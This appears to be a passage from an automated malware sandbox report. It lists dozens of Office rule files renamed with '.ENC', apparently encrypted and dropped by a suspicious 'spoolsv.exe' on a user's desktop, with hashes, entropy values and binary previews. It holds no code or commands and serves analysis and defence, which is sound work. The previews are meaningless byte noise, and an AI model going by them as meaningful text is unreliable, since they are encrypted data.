                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..`....K.....~.9.C.../....O..@%Zo+>...Z.N......J.(&.F.T_.w.....q..y."$...>o/..:T..qu.v.q.%.kJ...o.B..R...j>u.2.X...."...A..b.#...,.\....H/.kp..Tb.i.=.<..J...h%.ChNQ.c. f........E...t|{.M..t=.S.oahM..~!.z_$.........)vZ1=.........DP.x....$._/]rg.T...x.$...VVt..].{.{.0.....%.xJ..*Y..T. .-]:....Q.u|./.V.......<{x..&.6......O.K?...,<.b_..C.%.....Dg/p.7........6f..XG..G..M.t.p..F..v0......./..n.W..i|..Q...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120669v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.553501877254002
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s27YTEH5iZHagQj9cJGOaU3RvcAlLxN7ZT:/rc55EcJGOf35jPd
                                                                                                                                                                                                                                                      MD5:17E31F67A237DE3020A6DA846EA0AC54
                                                                                                                                                                                                                                                      SHA1:F7DAB05BC2B78709BA605CCD113878A71C798D64
                                                                                                                                                                                                                                                      SHA-256:464F87DD3D7A252A23C6BC706851075847DD9C8487C0CF174B3E2759ED8997F1
                                                                                                                                                                                                                                                      SHA-512:1722CB36E51B7256E31B13979B5BBBD3D1340E3F03C234E7B765885B91CC2F954C9B21741231AE46AB7765616B5093BA77FDDA79B01300624F2400FC90B8506F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.*.v.r.L&.............sQ.m.........2../..i= ...X0....lRb.c..8S..%.=p-.K.1[.iy..._t(....=}A....g...!K.W..a...."r...|.lWV/c.e...q.t.'."..dC.......dP.}.....7..-Y..4........[...3m...)...x./.A=.?...b......0..6p[..B..q`f..9t.~".6..G.).#;%.*X...L.....I$......`....D..x..u...f8g.Z-.|..$..L....U~b.qGQ...Gn..R."*..?..8.......m.T...>.j..{m....$.....z.A..ar.9..;.._.Q...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120670v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.570548799911121
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2+YVaRO9Sh4a6IuKf2MnPCgX4W+KkIxONIUqsYW+n:/6YVyYklZOMnKPh/I+IzsMn
                                                                                                                                                                                                                                                      MD5:3EABB130716DD4E24C69FB6EDEFE1605
                                                                                                                                                                                                                                                      SHA1:C326741977DE8C94A389F897EC6772EDF50C0385
                                                                                                                                                                                                                                                      SHA-256:9E7AEDF565240930B204FC3DF53B563ED38792F1AE015F8E4E814C1E4EAF39B3
                                                                                                                                                                                                                                                      SHA-512:53E8A3A8EEF77715BA4B276F81B4D9A456A5FE82E39C00C4D437B09336C6A87968F52CD8E3C20A78EE94F6E634543E74AB7152D16972239A79D590608EA6C9BD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.........,...h...c...z..... .L(-.B.G^......q#.NB...zg....2.r...?P..7/S/..O`j...]..a.mz'1..Z....dN..8Z.eE......kZ.![..}.l.<.9'..A.W..mcL...?.aB...j.aw......c.d.7.5.<..ve....w....g........2.=9M}q.m.X..<..].~...A.#.......,.`'lfU...'......_...Y1..-8.C..mT..&).b............6..-.E..`).D..7V.b....$$..;..u...q.O..o....l.?...].7......v...Z...k{|._..C..^..N.;..j..9.b.@.......Q....nfy%f..6GT.8.X...~..#....*yIq....k..C..-`

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120671v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):448
                                                                                                                                                                                                                                                      Entropy (8bit):7.492819223488123
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2N5+K8iblJLNGmkE3gn4TeLdS2DXVYx4xzCOHZ7:/CibpG3KeLdFDF8AzCu7
                                                                                                                                                                                                                                                      MD5:EF6AE1C2CB0EA0D53C438464EA6E9063
                                                                                                                                                                                                                                                      SHA1:A36AB26AEC057AFCD98B25B91D820FB04A341BF3
                                                                                                                                                                                                                                                      SHA-256:465A527761A2CB3667E24BC1D18CCE2664106A443A49C241B1C0F99505C21BBC
                                                                                                                                                                                                                                                      SHA-512:0C8E4915877794E339C86D1261716F24FFDDA3178F2147DD3AA81B28B6C92C7127146F47B8D22731900398FED550554BAD01DB5B56847B519DFF28204FED3081
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...8....N.w. 7_.]A_..j^+......./...Hv#2?..0..GB..u,x... .._}......Du&@3[.zB.)$W.Ti..Y?y..-}...y.y.....W.@n.o.n..>_.....*...;a.......R...p...}.v$..$..<..t...3.......XW.....HKa5.W.cRK.0:O..u.(.R...gL.?;.j.`....zdyd.^b.R%4(tq...TU.Y.oz".&KV.-.v.~.h.5...D..^..r.......n..:q."......o#.-.$,....D#(...]l.....!|2.3 Y......W..>...?..-Q...?..^..m....HsG.N.aa.B}4..`Q...._.|y.w$..r)......[.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120672v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.581873260501079
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s28aIq8oBqov64sVo3Jqw1jS7ipsp1qpFSAOggnOUo8l3DXX/6iUYtm6tsO9:/7s28PksVMjZsnqpFSnCS37CEGlv0
                                                                                                                                                                                                                                                      MD5:7FE2C4A611648AF8E63D31A9AEB481E8
                                                                                                                                                                                                                                                      SHA1:4FD1AE268E20932FC6DB925CC8334B84EE4D3A72
                                                                                                                                                                                                                                                      SHA-256:D9D0DED092DBC1EE6F7992E992024BAB74F969B171B2CB88B66971B6FFB139CD
                                                                                                                                                                                                                                                      SHA-512:F7CB6399B2CC4F7F98309627189EE1154D4CC0EE58B87F81E97743B755658E13CCFDC3BF54D205E2D0F70DD3D12B6A8C9D97A146BCFB25859F5A7EB75987914E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..kp.qi{...[._!.d....[`98....J.)[.}.s%8EC...Id.n..Q....o....C;RI.....Vw...3.|....~..e...C.}....(.!......c..F.j$....#........._....6.uT.5..k..f.T...}.....i-%r......`...J.....8L...{;...p..._..........g.f.^@......p'....9.c'c...YpO0A..Q.B..P|..lq.}.d./......f....E.+._.....\..K.xF.O./Y.t.$..L...8+A.. .....D..F.p............Po.+....:3.......g.Z.h..,.9.s..Z....#M...8~{....z.0.7...@g...lo.N....=..MD.WQ..ak.?...j.2

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120673v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.48542338296183
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2u7Qa3zuzVKxLTg63tSqn+tzuNOyNxHCVT:/layRK1Tg69Sqn+9uN1Nx6
                                                                                                                                                                                                                                                      MD5:2E166C1CE354C8D94B2354760A979B71
                                                                                                                                                                                                                                                      SHA1:59D5E3CB19F5A5076F831ADCB374BA34C25A10DE
                                                                                                                                                                                                                                                      SHA-256:5049A6E6656E476EA2CCC19F7B20F786C037DBF6E46754F9461E5C1883EA6E0D
                                                                                                                                                                                                                                                      SHA-512:824E6079D054EB4A6A3046702B61F857F6DC8767045D8720DA7EFBB4BCC16954AA9D7D230B9212D5F61A7570E6BA949F7A83E37FE07D5163AC1A3C46364604B4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t........Fl.b.!'k...4@..s+.d.Bp....N.zjka.nN"P.!F....>W.^~..f.f?........&.F.......g..f.3Q..jQ./.6*..\.}..%.!.w.y.9....-hE.W.l....3@.9...".....W...%.(..1..OK.)...._.....o..s.....%*.q...L.:.d.....Z) 5{...O..._N.<z.dJ.F@.{+...._..O.G.34..P..h}B..6..U..JwG.)..~....g.....5.L..{.^v...........^i5.......e..W...Z.b!"..-.p....#.dN......t.<.=xz.]..(..vC..^P...y.V..EKj..U..w

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120674v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.548094685143482
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2/lG+VT39QJYgqGSvWGmd/Efa25/d4WEfb014d:/TlJVRQJr6cIxJd4ig
                                                                                                                                                                                                                                                      MD5:C3DE861B7DC664FA0F1A214990DC2D0B
                                                                                                                                                                                                                                                      SHA1:144557AB2770CDDBB538E899D8C9C97CF33E65E7
                                                                                                                                                                                                                                                      SHA-256:635D2A1E712C86CFF755DF29BDB8F29E08CA4146F68DF18821E9908C50AABA2B
                                                                                                                                                                                                                                                      SHA-512:98290EC1188F49647F5C91501DE43E20C1C0CC255258D1981CBFFFEB6213BCAC70C34AD474CA2FA19965B116C90FBCBD37524237260D036E9854EE5F10E9B71D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......$p.>m.Wlx.d.~..LQ.|..).7.gvc.d.h.i.@.`..l|.0.....k.....%....!4..!...Q.q.@W...tb...v..u.[.. ..Q.v.[\..4.c..'...^...3.p..aj..V.L...'.I.......;...2.HH3..?..Z......4.mXG)g...A.H....s.......5....@....L....r.w...gFU.]1.C....c.v..].......r..[...7F\/.....&.0......#)w]5!\.#.....e..a(t).^.........d...h. .\5..?...m9{(...F.....t?w......'......F.*Z]h)..;X~....nu.....*#..........(.....r..)Z|......R.*..x*$...a=..o

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120675v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.486939637665654
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2ouLqJJYdXdSDb1G8acUuMmyXmzRsdw3QN6jjPAhkkX:/C2dSDb1G8acUu7rNCwLLAp
                                                                                                                                                                                                                                                      MD5:A5DA75AB962885984267D25B34D16166
                                                                                                                                                                                                                                                      SHA1:4BDCBE8253A40BD1C3E22800C8E52A2577527A58
                                                                                                                                                                                                                                                      SHA-256:426048083D3C68E5C9BFD873EE4222505F8071F7E2A23913335C8B581DCC1FD1
                                                                                                                                                                                                                                                      SHA-512:2E1D3A9B6A385BB7F74232F92BCA097CD51B4BFEBFD4726FAEDE1EDAC799FEC3A51E1689F1D02332194A74E7F700AAFB0D33189D0C7E245169493253F48C6F07
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....P..........,.}.T=t.07...!.2...../..t4b7.p.K...yL@..{..5.8..0~....;O@J.1...*.|...o...L~*...q.N.].%."..u.}~Yz.c.....q...5......>PX...n;..:..-L.dw.$y..#.....i.U...yy:_:.@.~c.......``Y%.._...S.Y...(.qTz.J..) .<D.7!.....~+.0w @R.%j.....KCaT..jx-.....5..%....l.9>"........Y .WL...`2@..h....8...059=..|+#.......4.6.....P.Sm@f.W...h......n.n.............'...&.G.7.A....8$2

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120676v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.592800578204909
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s25ihAYv5sUeu1udmR1Vf/7/W7xAlhpf8ekI0:/VOAq6ldy1VDWub0
                                                                                                                                                                                                                                                      MD5:8227A505343A7021603397F6E554C57F
                                                                                                                                                                                                                                                      SHA1:31AFB772B0BADE2674EED4545DF261BA26476313
                                                                                                                                                                                                                                                      SHA-256:42BF767ABEDE0D6B1ACE554C934D3A67CC3B8FF664FA9BFD7CAE2709C0BF59AE
                                                                                                                                                                                                                                                      SHA-512:1E5224A8386294F50A61A47917A4A3C3B3E93AB772EB17CEA684D870B5F50E6F1A493EACA224902EE57875E862896129ECD997BB4FAA8F59837E118CA20AEE06
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......a...M...F..w;.Rt.....'.Wf..H..j.&._&J.Z;.....u'.SV.$..u..CK...d....g...5../;h`.`..+.r.R5f..X..Ygg.+JX.da9..8..L..d.$..U.r\.5.....M...I.....M.'.*Y...RT..g.(..=.....X..3b~...U...l....w.~..S..r....]dy..k9......?O....&._KT........qD...U.....C.K. <..i./..-.W.E....m.....v.O...4..G....)J..gt.Z......A...~..VD.K.aI....Bpe"T,.....gg3v.K.z.....F.p..U....U(G.#..F.0..7...Q."`.....F8a.r.-.l&...4f..,.|.~.~...hi....Zw.^..9\o..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120677v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):416
                                                                                                                                                                                                                                                      Entropy (8bit):7.523543851730822
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:/b20s2fwiddlES/TjAmTaBPQSe+P1oG4V41hv8u/LZ2Dv9ftY2pBTk:/7s2HpE4TcmTaPQS51oNkZRl4v9lY23k
                                                                                                                                                                                                                                                      MD5:F9A726ED0C651CC4D08792D19D2A2C46
                                                                                                                                                                                                                                                      SHA1:5BDA28AA202C77CA39D6D5D02BA6455B5D08B646
                                                                                                                                                                                                                                                      SHA-256:E89B9E2E3187B36BC60B1D201A8DAF6557FB029495F54E8666CF3B3B8BA51288
                                                                                                                                                                                                                                                      SHA-512:43F8393B90D286A658666B75353FE09623C275AC34E5D67A4E3B6C2CB0EA64FB4F1DD70AEEB05AD00C48D450C2F34B0720B309EB55E01930F4DC527CF4A01CF5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.2`..h*........4s..?S..oB..!....4..[.'......x..E.!.Fj...}...3.KZ.....o....@.WU.s...X.?&hf.....o .......<.F..[.p@a>..w............E-..[Y...w..B}*.G....A.._.+P.......y(...b.%....'.......y[....h<}.y.....0.s...mDi..s.L9.Y.R.>.. ..|.;^.\...@-...,f...J...}u&.f..p<.U...`.2XWCt........C.L_D...e.;......a.jT>...7...%../v..rT..j<.,...*...0.s.W:t..>..I..6^F}~a...h

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120678v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.575233487568391
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2AdkTJCy1IWbfHTVtn2651Bv5gQVi8rBm4rGlrBRaYq:/o2IAPZ/F9KTO
                                                                                                                                                                                                                                                      MD5:CCC798DB25778F2853D8E2414A5D24B2
                                                                                                                                                                                                                                                      SHA1:CEC76C91208258BACAB1CB7445E992EE10F85E9C
                                                                                                                                                                                                                                                      SHA-256:780488563E2BF5E5868247CF4B0197CAD71CC62769FA1B1E6C7938F044145D26
                                                                                                                                                                                                                                                      SHA-512:2BE3E87D9ECC4D285D7951E85F3E7163025EAA8E0C436BB7FCA5C3CD4338D4A7695484DD5999FCE5316389C63B1549C31F9013707A238AC4D1ED6F57EFF94098
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..^.".......-<.[tF.C. (B.....#..\G..!......3.h..+N........t}S..j.%uU...$..Ej.ls.\S...z....s.[..>...&..\.....6S..N....F........h..&.8^E.R..>....z.......[.6..sr.C.A...FO.p.D.9....WE....l...k...T....1..D.."....K.f.;.F....M<..[-q~CG...E......,.......e.E.8...2[./.5p..b,..9.7@Q..<.d.K.B.i...\......|."U.vM}e..-.....>...T"P..#.f......./;./.v..G...N.[M..O'a.....b...t.Y`Dd..mJ.]..i.........j.......n!V.,Y..r.N.......v.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120679v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):176
                                                                                                                                                                                                                                                      Entropy (8bit):6.937985950962209
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:/bqrarQXJ6Scs2ufeFX3nXlgg7l1ac2n/j+7aPI3eA43Js4+KxCqk8ZqbMq1GcQ1:/b20s2AaVt1R2/1SqC18ktGcg
                                                                                                                                                                                                                                                      MD5:E7D50339BDAD003C126B2177B79709D4
                                                                                                                                                                                                                                                      SHA1:E2065F17DFF3A51B654A9552C8DB534C722B0DA3
                                                                                                                                                                                                                                                      SHA-256:236D15201CADE09DF405A74F16757D6C2C5D8DC78467287919544C1A4BF7B4BE
                                                                                                                                                                                                                                                      SHA-512:3DB692D5011DE52A25675CC034670E5B623B63784D02C49D5C51882F1E81B461737BAC51E4190A31E3EC805938CD859F7D41DF139B3611D1CA267DA6CA3FD817
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..P}.t...M.b.`".....1G....W...r...3-.......ZP....j....=..u.-.+yQc......!.c.x...T.f.]...,.Cw.[/5.hgO6...d.....K...|...6..#9.S.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120680v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1968
                                                                                                                                                                                                                                                      Entropy (8bit):7.900059104243076
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/+NktJxdgQ/qyqsCVbSeS2tBVz71CTcU/sMs:iktyQUVhSObp+lls
                                                                                                                                                                                                                                                      MD5:253C7C45EE70463A02025BF921E09904
                                                                                                                                                                                                                                                      SHA1:383EDB234CA9DE436E6027C063905014F86400A9
                                                                                                                                                                                                                                                      SHA-256:D27327CF9BBE117E7AE21BA142ACA71DD1CF93F12F3918CE47AC96FCA6F78142
                                                                                                                                                                                                                                                      SHA-512:F68355959CBF052869CE6BCF72C492F961CEAB83DC79C367E5397E02E87367D3F0921D5172A19800D64E295ED5FC32C458376BECEAEC75952644E1128AD5D92C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...M...r......g.(u......Y...........B=..Pj..XB?.$..j.y........M..(.]......0..K...T..j...S.W.n.V......a<f....;.......p...#>..1....|:%l...uz.|.............T<....5J2...:.V.yT......Gi_.Rj=.+.kn.oh..};%V.~.....hx...S(..~..e?1..r..a...l".v6..{S.9].j..l...U...b...:R1W:.x..{.a]..8i[g.(........8f........ub..\..k?......nIF'.z..W.3.P9.....`i....{;e=.............".5..!2U.t.j3....5.Qg./7.4_.9..,L.O.....I@y..o..X.I..V.&.......q'G..x..x.>s...t5.{T.-%i6!H.R6b.0.9j.&_.E..Y.R....J....l..m..8...p.....x".C.......ae...n.....O.).5"....z..Y...r..i...Gh?0[....9.<......0._s..m..a'i.^^.d.h.3.)).....i?.^;...p.\..S^,...C+abP..+.~..r~..0x.......Q.....o.U.n..n%OQ...(.+..X..;Q..R..|...&Xj..g.LD.(...yx......t.@.............8.l9..vx...?$Na.$.....1..&.....-....Z..,.........q|.x.Y.y;|A.*Ha.H......N.........I.4lQ12.^.......'.......7.f.....Q..........;.....s)II.....)u..9z....r..M.r..=..9..J.u(...w!.!>...\.UB..7...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120681v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):960
                                                                                                                                                                                                                                                      Entropy (8bit):7.813811557734569
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/FRFMu4tSEcUp8NmXj1dflFmP38zQ3WSBg2KNEu5Nq:/vFHaSTUp8U1Nk8zQGSB3r2Nq
                                                                                                                                                                                                                                                      MD5:6CD3AE690349504F1DF3186B680C798F
                                                                                                                                                                                                                                                      SHA1:9099E551912373561575CBC4C8A09188D1DCE6D9
                                                                                                                                                                                                                                                      SHA-256:E3C8C7632A623ABAE660F0EFA4CD4944E765F7836D2AA2257438056F0D06FF73
                                                                                                                                                                                                                                                      SHA-512:07B168BEAE7225934447A4049375326D00F6292380F5B6C5D9D3AA1631D26C5E831E41D4A9A46B8E72FEED830084888FFF4383A25A0DD1D1EDD38A8655679870
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.S<a.\.}....h...|....U.PvI...O.%8k;....|...n....$.Vu<.&N@....v.)#=.^.!.....{x......3..^W..D.bz..|q6f..,../&I....h+."h*..eG..}|$Q...o.q.o..3....=..m..|@...V?..<n..WUk~.<....+..)..z@.<...k..cWT.x..|....;...&F..`./..}..(...Q./i-.h.2|...J>.f9N.&#v....i1...x..Dj.......E..".3.5$.z.es.:![....\.\6.Aq..1.t'....LL.t.U..a..q8:...?...J..... ..|..6]...".0.(.....+&.J.[{....y...F..m.....s.Va...K.gz{."...s..`.X...t.S...~T|.HM.LD....#Zd...|..k.[....>...W<J.o/.k...]...-.%...i5n...F.0.w].6...e6|.O...1d..3........L.(&...V-8...X ...,B/oY.^...1.Y..Y....JU~6...8../...1.99......j...Ak.~......<.e.^=......2...@p.aoOHm...u..4:..."...>....5..`....?.....;-[. m!.&.+...S(?...p.Mt.KB'..$.....Q.-.s!........\?g.......n...r.'.....jj....`.D.gq.o..#?.\DgY.......-8...5./.EQ.v.l......OI.......2....)...N=...>.7.50..~@....$......i.g..D..rK#...%;...%.......|..:...=..C...o(I..j.$m!.......2......!%

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120682v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                                                                                                      Entropy (8bit):7.553720536872049
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:/7s2tcYxKXS3qwVj12olF9JXcsudYmeOu7EEDqvpaQSk5N34o6UAa:/p9Ki3qYj1LWY/OxEG9SkV4o6UAa
                                                                                                                                                                                                                                                      MD5:664ED1AF2F02C81F6B8580769631FEA7
                                                                                                                                                                                                                                                      SHA1:264C81A599FB939096E3373E467AAC9D2F3B4835
                                                                                                                                                                                                                                                      SHA-256:427D6D6A10FE8292DED8AA0E8FBDA62FC6F6CE73308E32977B20C286502A8238
                                                                                                                                                                                                                                                      SHA-512:6A32A736098E1622983657AAA200755077BEC1639A50FB6F65290A1BE2AFAD9423F54DA40B3207AB775675B488D25643AABC6B18422ACF9467A72910A0F13595
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...c].A...M+..5.m.?>.`NI..n-W.=..;e.7.I..4....Y..!I5j.(q.@......F..q......j.Q3.m..`..........YB6<......>..~.|..nxF|.$.....?.....4..).xi.,....gx.Y.m..8..-...k...g;.B._Y....jT....1.8(...xc.T.fj|..5'...t.(.....<>.?...tb.......xP.($]...f../.W=Z..~...._>..a...m./v.pLH..p..^..E.n..Jj...WO...C..%........O..?.../c... ....c.:.....e.w....z.. h.}.E..}....5x..H....9...}.....k...~...&.c..0h........4C...P..p..-wm.....9...Of(..B-...K........%.A-..:u.Y%

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222015v6.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.854653588701201
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+PZIe9wJ0nvkYnNA7BWTvcG0wERKK2FGNVgDOV4hZCBgHf2zqCfeIPl07:+PZB9wJ0nMP7s7swERUqgDOAfWfeIPlk
                                                                                                                                                                                                                                                      MD5:5E88E0AC6136FE9086A739BE57B7E965
                                                                                                                                                                                                                                                      SHA1:A5F533A35B2A39A7AD19C266CE22C676248AB52B
                                                                                                                                                                                                                                                      SHA-256:4911950A240C8E47770E0B331745AD4898AF614072A8378B3A1700EEA48112E6
                                                                                                                                                                                                                                                      SHA-512:48CB8911BF1858B2705B5412A42C7DD2A0D2D24633BA7AA55319160217FB3184E63EA19777097579385501A8AC73867147FF28C494E108386F4F08667311C224
                                                                                                                                                                                                                                                      Malicious:false
